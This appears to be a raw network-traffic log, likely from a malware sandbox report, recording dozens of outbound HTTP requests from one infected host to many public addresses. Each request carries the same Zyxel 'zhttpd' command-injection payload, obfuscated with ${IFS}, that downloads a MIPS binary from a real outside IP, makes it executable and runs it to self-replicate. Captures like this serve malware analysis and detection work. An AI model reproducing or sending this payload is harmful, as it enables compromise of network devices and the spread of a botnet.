                                                  Jan 19, 2024 18:23:44.820605993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1668192.168.2.134114473.43.207.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820626974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1669192.168.2.1333562174.192.10.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820684910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1670192.168.2.1346866196.32.230.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820718050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1671192.168.2.1333780171.106.252.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820746899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1672192.168.2.135870418.39.100.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820806980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1673192.168.2.1355174160.233.50.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820833921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1674192.168.2.134907035.157.144.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820885897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1675192.168.2.133891648.233.199.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820914984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1676192.168.2.1352532209.126.94.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820941925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1677192.168.2.1345082148.66.112.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820998907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1678192.168.2.1345080192.129.12.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821048021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1679192.168.2.1351826155.24.28.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821072102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1680192.168.2.1338634169.159.190.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821104050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1681192.168.2.1360394177.123.168.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821152925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1682192.168.2.135769293.22.192.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821206093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1683192.168.2.133780213.168.16.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821244001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1684192.168.2.1346362219.238.201.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821275949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1685192.168.2.1343380101.203.252.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821326971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1686192.168.2.1339082141.39.82.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821347952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1687192.168.2.1340374101.251.47.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821405888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1688192.168.2.1339092196.197.200.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821464062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1689192.168.2.1356360132.170.47.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821497917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1690192.168.2.1353262170.3.91.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821541071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1691192.168.2.1345966191.139.76.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821578026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1692192.168.2.1352748187.170.104.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821620941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1693192.168.2.1343170168.96.237.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821676016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1694192.168.2.1360598168.147.32.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821717978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1695192.168.2.135102439.143.131.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821763992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1696192.168.2.13491621.21.75.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821800947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1697192.168.2.1352598132.242.229.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821850061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1698192.168.2.1351404220.58.28.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821873903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1699192.168.2.133520861.240.192.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821908951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1700192.168.2.133409454.41.159.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821934938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1701192.168.2.135955868.41.64.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.821975946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1702192.168.2.135775499.169.162.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822026014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1703192.168.2.1338086155.121.55.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822077036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1704192.168.2.1360270122.161.168.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822108984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1705192.168.2.1345914146.22.165.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822140932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1706192.168.2.13512109.102.82.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822200060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1707192.168.2.13340345.233.108.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822225094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1708192.168.2.1339564157.245.182.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822263956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1709192.168.2.1356164139.80.86.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822298050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1710192.168.2.1338076185.46.118.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822329044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1711192.168.2.1348822192.155.47.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822371006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1712192.168.2.134389254.237.113.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822396994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1713192.168.2.1350614155.153.74.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822446108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1714192.168.2.134698448.32.80.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822479010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1715192.168.2.1351340162.129.52.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822529078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1716192.168.2.1354662162.96.84.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822571993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1717192.168.2.1344040183.195.208.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822612047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1718192.168.2.1346062121.212.231.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822640896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1719192.168.2.1342052151.19.23.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822702885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1720192.168.2.135298487.229.135.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822742939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1721192.168.2.1358496100.208.171.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822767019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1722192.168.2.1344690163.253.105.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822817087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1723192.168.2.1359832115.127.208.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822932959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1724192.168.2.1342550142.11.240.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.822963953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1725192.168.2.135838646.11.11.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823008060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1726192.168.2.1359548106.72.69.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823039055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1727192.168.2.1351300140.59.80.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823095083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1728192.168.2.1360984153.195.27.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823126078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1729192.168.2.1343864147.168.252.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823160887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1730192.168.2.1352206199.40.229.52443
                                                  TimestampBytes transferredDirectionData
